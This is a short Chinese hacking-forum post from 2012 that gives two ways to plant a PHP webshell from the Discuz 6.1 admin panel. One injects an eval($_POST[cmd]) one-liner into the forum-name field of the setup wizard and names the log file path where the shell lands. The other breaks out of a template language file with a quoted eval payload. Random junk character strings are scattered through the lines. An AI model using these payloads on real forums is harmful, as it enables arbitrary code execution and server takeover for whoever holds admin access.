找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2346|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell5 X+ A7 T, ?2 e/ y9 n
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
  N" u! c0 B, p1:# n! }: D- O* A& K( N* d9 q
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
$ K# F: [7 b' L% Iadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell: a3 l" |6 {8 C( o5 I2 p" b2 O
<?php eval($_POST[cmd]);?>( ]; ]2 B# ^: e: Q
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php! P, x# ?) ~7 E' Q- y  U& W/ R  G
# s& N8 p1 ], r- c

+ N' ?6 g$ Y4 F' I5 `2:后台模板管理--默认模板套系--详情
8 \5 i  k2 h! btemplates/default/actions.lang.php
, n) R+ J% g" {. Y+ rjhackj\\');eval($_POST[cmd])?>;//& q* M( F! p4 d: k% M8 p; w/ z& e

+ u2 k. n0 A) T* P/ Y利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表